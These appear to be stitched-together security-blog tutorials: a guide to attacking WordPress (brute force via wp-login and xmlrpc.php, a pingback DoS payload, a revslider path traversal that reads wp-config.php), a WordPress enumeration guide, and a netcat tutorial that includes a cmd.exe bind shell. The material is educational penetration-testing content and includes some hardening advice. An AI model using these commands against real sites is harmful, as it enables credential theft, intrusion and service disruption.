Before starting with this blog firstly visit wordpress enumeration blog .

Researchers discovered an ongoing malvertising (online advertising to spread malware.)campaign targeting millions of WordPress websites to infect with backdoor and exploiting the various WordPress plugins vulnerabilities.According to WordPress, there are nearly 60 million Websites power by WordPress content management system and hundreds of WordPress Plugins are installed that developers by various developers around the globe. Cyber criminals launch the payload by exploiting the vulnerabilities that reside in some of the most popular WordPress plugins and injecting malicious scripts in unpatched WordPress website.

Attacker: Kali Linux
Target: WordPress

Table Of Content

1.Brute-forcing wp-login.php form
2.Brute Force Login via xmlrpc.php
3.Denial of Service (DOS) via xmlrpc.php
4.Exploit WordPress Plugin
5.Exploit WordPress Theme Example
6.Sniff and Capture Credentials over non-secure login
7.Compromise Systems Administration Tools
8.Content Discovery
9.Vulnerable Server Software

1.Brute Force wp-login.php Form

The most common attack against the WordPress user is brute forcing the password of an account to gain access to the back-end of the WordPress system. Other ways a password can be compromised include sniffing the password in clear text over a HTTP login session or even getting the credentials from a key logger on the workstation of the WordPress administrator.Accounts with administrator level access are the most sought after due to the amount of mischief an admin user can get up to; adding PHP command shells or malicious javascript directly through admin interface are common examples.

With the usernames we collected during information gathering we can get started (or just try admin). Take a look at the login form /wp-login.php, notice how failed logins confirm the username when an incorrect password is entered. This is very helpful to an attacker…. it also makes things more user friendly for the end user who has forgotten their username and password. This “feature” has been debated and it has been decided to keep this response within the WordPress code.
Brute forcing accounts of users is possible using a number of open source tools. In addition there are worm like scripts available that have spread through the WordPress ecosystem, searching for and spreading to WordPress sites with weak admin passwords.

WPScan

The previously mentioned WPScan tool in addition to enumeration, can also perform brute force login attacks.

wpscan --url example.com --wordlist /usr/share/wordlist/rockyou.txt --username testuser --threads 20

Nmap NSE Script

Nmap the port scanner can do much more than find open ports. Recent versions of Nmap come bundled with NSE scripts that can be used to test many different vulnerabilities; including enumerating users and brute forcing WordPress passwords.

nmap -sV --script http-wordpress-enum --script-args limit=25 example.com

PORT STATE SERVICE REASON
80/tcp open http syn-ack
| http-wordpress-enum:
| Username found: admin
| Username found: testadmin
| Username found: fred
| Username found: alice
| Username found: bob
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-enum.limit'

Burp Suite

For those familiar with web application security testing, the Burp Suite Intruder tool can also be used for brute-forcing WordPress passwords. A WordPress login attempt is only a HTTP POST request after all.Configure Burp Intruder to send a valid username (or a list of usernames) along with a list of possible passwords and wait for the successful login.

2.Brute Force Login using xmlrpc.php

The xmlrpc.php capability is an API endpoint that allows mobile apps and other programmable access to backend functions of the WordPress site such as publishing posts. It is enabled by default and several attacks are possible against the endpoint depending on permissions and the version of the target WordPress installation.
By using the xmlrpc.php endpoint to attack WordPress accounts we may bypass security plugins that are protecting the login form from abuse. This password guessing attack may also be faster, with the result being you can attempt more passwords.

Notice the -d, in curl this is the data that is sent as part of the POST request. You could also use Burp or your favorite scripting language for this request.

curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>pass</value></param></params></methodCall>" http://examplewp.com/xmlrpc.php

In the response we will see an invalid password response or success. It is easy to spot and work into your script.

3.Denial of Service (DOS) via xmlrpc.php

Another use of the xmlrpc.php endpoint is to perform a denial of service attack. If this capability is enabled, we can send a small request to the server and get it to respond with a full page of content to a target of our choosing. The idea is to make multiple requests from different systems and get them all to target a single host. Potentially knocking it offline due to network congestion.

First, we enumerate the capabilities of the xmlrpc.php endpoint.

curl -X POST -d "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>" http://examplewp.com/xmlrpc.php
The response will be a list of available methods.
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<params>
<param>
<value>
<array><data>
<value><string>system.listMethods</string></value>
<value><string>system.getCapabilities</string></value>
<value><string>pingback.extensions.getPingbacks</string></value>
<value><string>pingback.ping</string></value>
<value><string>mt.publishPost</string></value>
**** truncated ****

Note the pingback.ping indicating pingback is enabled. Use the following data for the pingback attempt.

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>
</param><param><value><string>http://**blog-url-from-wp**</string>
</value></param></params>
</methodCall>

Disabling access to xmlrpc.php from your web server or using .htaccess is recommended if you are not using the API. Not only will it block any attacks, it will reduce the amount of noise in your logs from the bots attempting to hit these API endpoints.

4.Exploit WordPress Plugin

Plugins, Themes and WordPress Core all contain a large amount of PHP code from developers around the world. These developers have differing abilities and focus when it comes to writing secure software. For this reason, there are thousands of exploitable vulnerabilities available to an attacker. Updating plugins, the WordPress core, and themes must be a routine task for any WordPress administrator to ensure the known vulnerabilities are patched.Common vulnerabilities include XSS, SQL injection, file upload, and code execution. All of these can have devastating consequences to a WordPress site. Search through Metasploit and exploit-db.com for exploitable WordPress bugs.

Revslider Example Exploit

An example of a WordPress plugin exploit is from a vulnerability discovered 5 years ago. The vulnerable revslider plugin resulted in tens of thousands of compromised WordPress sites. To this day, there are attempts to exploit it in our web server logs even in 2019. One reason it was such a popular plugin is that it was bundled with many themes.

A number of exploitation opportunities are possible, but this is perhaps the easiest to demonstrate. Exploitation is as difficult as loading this URL in a browser.

https://example.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

The HTTP request would download the wp-config.php file from the vulnerable site if it had the exploitable version of revslider installed. The exploit type is known as a local file include, as the attacker is tricking the application code into including a sensitive file in the output. The wp-config.php is not normally accessible and contains the database credentials for the WordPress database user.

With the database password, an attacker could attempt to login as the WordPress admin using the same password (if passwords were re-used). A more common attack vector would be to login to the phpmyadmin script, if installed, as this uses the database credentials. If MySQL is exposed, it may even possible to directly connect to the database using a MySQL database client and the leaked credentials.

Access to the database provides the attacker options to reset the administrator password, attempt to crack the admin hash, modify content in the database adding malicious js or iframes. There are many possibilities for further exploitation once the credentials in wp-config.php are leaked.

5.Exploit WordPress Theme Example

Exploits are available from various places and forums. This example uses an exploit from the popular Metasploit Exploitation Framework. The vulnerable theme is the very popular optimize press. The vulnerability was released back in 2013 and versions after 1.45 are not vulnerable to this exploit.Numerous bots and automated attack scripts that exploit WordPress sites do not perform the enumeration phase, they simply propel exploits at thousands of sites and hope for a successful payload.Plugins and themes not enabled can be exploited. Scanning for default locations of those vulnerable files is a highly common attack by automated bots.

6.Sniff and Capture Credentials over non-secure login

Without additional security measures in place (TLS/SSL), accessing the /wp-admin/ dashboard is over an unencrypted connection. This means if you log in to your WordPress site on an unsecured network, such as the wireless at your local coffee shop or airport, your login and password to manage the site could be captured by an attacker watching your session.

In this example Wireshark capture we can clearly see the username and password being captured in our POST request to wp-login.php.

7.Compromise Systems Administration Tools

A successful password guessing attack against a server management account will give an attacker full access to the server and the WordPress application.Services that can be attacked with brute force password guessing include:

>SSH Service
>MySQL database service
>Webmin Server Management
>CPanel or WHCMS Web Hosting Control Panels
>phpMyAdmin database management application

Reduce the chance of management account compromise:

>Use strong passwords everywhere, do not re-use them!
>Move SSH to a different port
>Use TLS/SSL for web based management services to prevent sniffing and credential compromise
>White list IP addresses that are able to connect to Internet facing services

8.Content Discovery

Content Discovery is the process of attempting to find items of interest in a web path. It applies to any web application, but since we are attacking WordPress, target it towards typical files and paths of interest in a WordPress installation.

For example:

curl https://example.com/wp-config.php.bak
curl https://example.com/.wp-config.php.swp

These two examples are using curl to find a possible backup file of the wp-config.php file that we discussed earlier, as it contains sensitive information including database credentials. The second attempt tries to download the backup file that vim automatically creates when it is editing a file. A good reason not to edit files directly on your production sites!

Using curl to perform this search task for hundreds or even thousands of common files could be accomplished with a little bit of scripting. On the other hand, more appropriate tools such as Burp Suite, or gobuster, a tool that is very fast due to its parallel processing, will do a much better job.

9.Vulnerable Server Software

Testing the WordPress application itself is only one part of ensuring your web site is secure. The server that hosts the website must also be kept secure.Exploitable security vulnerabilities can, of course, be present in server software or the operating system. Examples can be found on any vulnerability mailing list. Recently a remote code execution vulnerability was found in Exim one of the most popular mail delivery servers on the Internet. PHPMyAdmin is a popular application to attack, due to its popularity and a long list of vulnerabilities.
Server Software Misconfiguration

Even if no exploitable vulnerability is present, a simple misconfiguration can leave a service vulnerable. Often security vulnerabilities are introduced simply through a misconfiguration by an overworked system administrator.

The post How to Hack WordPress ? appeared first on Armour Infosec.

These 10 enumeration techniques are a very fast way to identify users of a WordPress installation. With valid usernames effective brute force attacks can be attempted to guess the password of the user accounts.

Introduction to WordPress Security

There are many common attack vectors that hackers use to attack a WordPress website. In this article we expose many of the common avenues for attack. By revealing these, you can help build your website’s defenses against WordPress attacks.

There are some great guides available on securing a WordPress installation, this article is not intended to repeat those. To get started with securing a WordPress installation, try the excellent guide on wordpress.org or the comprehensive guide on the OWASP site.

It is noteworthy that in a managed WordPress hosting service, some of the attacks (and mitigation) listed below will be the responsibility of the hosting provider. If you are self hosting then security and maintenance is your responsibility. Ready to start? Grab our hoodie and start hacking!

In this article we are going to discuss several ways to identify the valid usernames of any WordPress website.

Table Of Contents:

1.Usernames enumerating through the Author Archives

2.WordPress Enumeration via JSON API

3.WordPress Enumeration via the Login Form

4.Enumerating WordPress Core Version

5.WordPress Plugin (and version) Enumeration

6. WordPress Theme Enumeration

7.Directory Indexing

8.Server Vulnerability Testing

9.WP Scan

10.Nmap NSE Scripts for WordPress

1.Enumerate Usernames Through the Author Archives :

In many WordPress installations, it is possible to enumerate WordPress usernames through the author archives, including the admin username. To access the author archives, we just need to add author=n (where n equals any integer) as a parameter to the WordPress home page, as shown below:

http://example.com/?author=1

The request will be automatically redirected by WordPress to its counterparts:

http://example.com/author/admin/

Using this method, we will be able to identify all the usernames by fuzzing the author parameter.

2.WordPress Enumeration via JSON API :

Using a json endpoint, it may be possible to get a list of users on the site. This was restricted in version 4.7.1 that shows only the user that has published a post and the user that has been configured. Prior to this version, all the users were shown by default.

https://wordpressexample.com/wp-json/wp/v2/users

User Enumeration via the JSON user Endpoint

3.WordPress Enumeration via the Login Form :

You must confirm valid users with the login form. Brute forcing the user name is possible using the login form as the response is different for a valid as opposed to an invalid account. Using a tool such as Burp Intruder in Burp Suite, we would load a list of possible usernames and cycle through HTTP POST requests to the WordPress login form, examining the response in each case.

A HTTP response that matches “invalid password” indicates that the username is valid. We could then move on to attacking the password using the same process with a common password list.

4.Enumerating WordPress Core Version :

Three simple methods can be used to determine the core version of WordPress.

4.1 Meta Generator

Check the HTML source of the page for a meta generator tag in the HEAD section of the HTML source. This example is taken from the source of a default WP install of the version 3.5.2 and of twenty twelve theme. From the source HTML:

<meta name="generator" content="WordPress 3.5.2" />

4.2 Version in readme.html

If the meta tag has been disabled, check for the presence of /readme.html from root of the install. Early versions of WordPress had the version right there at the top of the Read Me file. But the newer versions of WordPress have removed the version from the ReadMe file.

Version in HTML source of site.

In the HTML source, the version is often appended as a parameter on links to javascript and css resources that the page is loading. Depending on the plugin, this will not always be the case and sites that have minified js and css may not have all this information leaks present.

4.3 Security Vulnerabilities in WordPress Core

If an attacker finds a site with an older WordPress Core version, this may be directly exploitable via a security vulnerability in the WordPress core, In addition, it is a clear indication that the site is not well maintained. In a poorly managed site, other components (plugins / themes) may not have been updated; in this case, the chance of a successful attack has increased considerably.

5.WordPress Plugin (and version) Enumeration :

During WordPress Plugin Enumeration, we attempt to find as many installed plugins as we can (even those that are disabled). The knowledge of the installed WordPress plugins may allow us to identify the version and research whether it is vulnerable to known exploits.

Passive analysis: It can be used to find plugins through regular HTTP requests to the WordPress site.
Active enumeration: It is more aggressive and usually involves using a script or tool to perform hundreds or even thousands of mostly invalid HTTP requests.

Reading through the HTML source of the WordPress site can reveal installed plugins through javascript links, comments and resources, such as CSS that are loaded into the page. These are the easiest plugins to discover and require no aggressive testing of the target site. Even the HTTP headers can reveal information such as the X-Powered-By header that reveals the presence of the W3-Total-Cache plugin. Some plugins do not leave traces in the HTML source; to find all the installed plugins you have to be more aggressive. A number of tools can brute force known plugin lists from the path /wp-content/plugins/ * plugin to test * /. The web server response will usually reveal valid directories (often with HTTP 403) as opposed to unknown directories on the web server with its HTTP response code.

Once you have a list of plugins that are present on the site, your WordPress scanner or manual requests can be used to determine the version of the plugin. In the readme.txt, we can see the version of the plugin. Compare this against known exploits and we can get a good idea if the site is vulnerable without actually throwing the exploit.

6. WordPress Theme Enumeration :

WordPress themes can contain vulnerabilities that might expose the site to compromise. Themes are collections of PHP code with HTML and CSS resources. More complex themes have more included components and are more likely to introduce security vulnerabilities. The enumeration of the theme is similar to the detection of plugins. The theme path is often visible in the HTML of the page source. The CSS file getting loaded from the theme will often reveal the path. With the path we have the theme name, and we can load the readme.txt to confirm the theme in use and its version.

curl http://examplewp.com/wp-content/themes/Avada/readme.txt

An important consideration when testing for vulnerable WordPress Themes (and plugins) is that a theme that is installed yet not active may still have code that is accessible and vulnerable. This is why brute force testing for theme paths is an important step when assessing an unknown WordPress installation.

7.Directory Indexing :

Directory indexing enabled on plugins directory. Directory indexing is a function of the web server that allows you to view the contents of a directory in the web accessible path. Viewing the contents of a directory allows an attacker to gather valuable information about the installation such as installed plugins and themes without the need to brute force the paths.

To check for directory indexing, you can browse to folder locations and see if you get a response that includes “Index Of” and a list of folders / files. Common locations to check would be:

/wp-content/
/wp-content/plugins/
/wp-content/themes/
/uploads/
/images/

8.Server Vulnerability Testing :

In this phase, we move into testing network services rather than direct testing of the WordPress installation. Port scanning is the standard technique for the discovery of network services running on the server.

Services that might be present on a WordPress host:

MySQL Server Remotely Accessible (port 3306)
CPANEL administration login portal (port 2082 / 2083)
Webmin administration (port 10000)
FTP service for file system access
SSH for remote control
Other web services with admin or other sites (port 8080 / 8888 etc)

Any of the above services may allow access to or control of the server through either a security vulnerability or a compromised password. Port scanning can be conducted using the excellent Nmap Port Scanner or an alternative security tool. Carrying on from our enumeration of network services using the port scanner, we could run vulnerability scans against the discovered services to identify exploitable services or other items of interest.

8.1 Nikto Vulnerability Scanner

Nikto is another vulnerability scanner that focuses on the discovery of known vulnerable scripts, configuration mistakes and other web server items of interest. The Nikto tool has been around for many years yet still finds a place in the penetration testers toolbox. Tools such as this throw tens of thousands of tests against the target in an attempt to discover known vulnerabilities and other low hanging fruits. It is a noisy process filling the target system logs with 404’s and other errors. Not recommended if you are going after a target ninja style (pentest / red team).

9.WPScan :

WPScan is a popular WordPress security testing tool that ties many of these simple enumeration techniques together, enabling users to quickly enumerate a WordPress installation. It has a commercial license that restricts the use for personal testing of WordPress sites and non-commercial usage.It attempts to identify users, plugins, and themes, depending on the selected command line options, and also show vulnerabilities for each of the discovered plugins.

https://github.com/wpscanteam/wpscan

10.Nmap NSE Scripts for WordPress :

Nmap comes bundled with NSE scripts that extend the functionality of this popular port scanner. A few of the Nmap NSE scripts are particularly helpful for enumerating WordPress users, plugins, and themes using the same techniques we have previously discussed. The best thing about this option is that if you have Nmap installed, you already have these scripts ready to go.

┌─[root@Dasagreeva]─[/usr/share/nmap/scripts]
└──╼ #ls -lha |grep wordpress
-rw-r--r-- 1 root root 5.0K Nov 26 14:51 http-wordpress-brute.nse
-rw-r--r-- 1 root root 11K Nov 26 14:51 http-wordpress-enum.nse
-rw-r--r-- 1 root root 4.6K Nov 26 14:51 http-wordpress-users.nse

The post WordPress Enumeration appeared first on Armour Infosec.

Features :

• Outbound and Inbound connections, TCP or UDP, to or from any ports.
• Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel).
• Built-in port-scanning capabilities, with randomization
• Advanced usage options, such as buffered send-mode (one line every N seconds), and hex dump (to stderr or to a specified file) of transmitted and received data.
• Can read command line arguments from standard input
• Optional ability to let another program service establish connections
• To read a banner from the port
• Encrypted file transfer
• Command Line Chat Server

General Syntax :

nc [options] host port

Getting start with Netcat :

Netcat can be used from any directory. Let’s start with the basic option which will show us the help page by the following command.

nc -h

Port Scanning :

One of the most common uses for netcat is as a Port Scanner. It can be used to know which ports are open and running services on a target machine. It can scan a single or multiple or a range of open ports.
We will use -z option to perform only scan and -v option enables verbose mode options for a port scan like below.

nc -v -z 192.168.1.200 80

nc -v -z 192.168.1.200 21-25

Banner Grabbing :

Netcat can be also used for grabbing service banner viz. Service Version, Status etc. To grab the target port banner from netcat, use the following command :

nc -v 192.168.1.200 22

Connecting to a Server :

Here, we will connect a FTP Server with the IP Address 192.168.1.200. To connect to the server at a specific port where a particular service running. In our case, the port is 21 i.e. FTP.

nc 192.168.1.200 21

Command Line Chat Server :

Netcat can also be used to communication between two users. We need to establish a connection before chatting. For this we will need need two devices. One will play the role of initiator and other will be a listener to start the conversation. Once the connection is established, communication can be done from both ends.

User 1
OS: Kali Linux
IP Address: 192.168.1.100
Role: Listener

User 2
OS: CentOS
IP Address: 192.168.1.200
Role: Initiator

On User 1, we will start a listener on port 4455 using options -l for listen, -v verbose mode, -p for port

nc -lvp 4455

On User 2, we will create an initiator by providing IP address of listener followed by the listener port.

nc -v 192.168.1.100 4455

Transferring Files with Netcat :

Netcat can also be used to transfer files, both text and binary, from one computer to
another. Here we will create a scenario where we will transfer a file from a Kali system to Windows system.

On the Windows system, we will set up a netcat listener on port 4455 and redirect any
incoming input into a file called output.txt.

nc.exe -nlvp 4455 > output.txt

On the Linux system, we will push the file to the Windows system through port 4455:

nc -v 192.168.1.200 4455  < demo.txt

The connection which will be received by netcat on the Windows system as shown below:

Randomize Port :

If we can’t decide our very own port to establish a Netcat connection. Then we can use a special -r parameter which gives us randomize local port.

nc -lv -r

Simple Web Server with Netcat :

Netcat can be used as a simple web server. Actually, web servers are very simple if there are no special configuration requirements. Web servers only send HTML pages over HTTP protocol.

while : ; do ( echo -ne "HTTP/1.1 200 OK\r\n" ; cat index.html; ) | nc -l -p 8080 ; done

Remote Administration with Netcat :

One of the most useful features of netcat is its ability to do command redirection. Netcat can take an executable file and redirect the input, output, and error messages to a TCP/UDP port rather than the default console.
To further explain this, consider the cmd.exe executable. By redirecting the stdin, stdout, and stderr to the network, we can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt belonging to this
computer. To further drive this home, consider the following scenario, involving Windwos and Kali.

First, we will start a listener on Windows system for remote connection which will take place from Kali.

nc.exe -nlvp 4455 -e cmd.exe

On Kali when we will hit the listener port of Windows, we will get its Command Shell.

nc -v 192.168.1.200 4455

The post Hacking with Netcat : A Comprehensive Guide appeared first on Armour Infosec.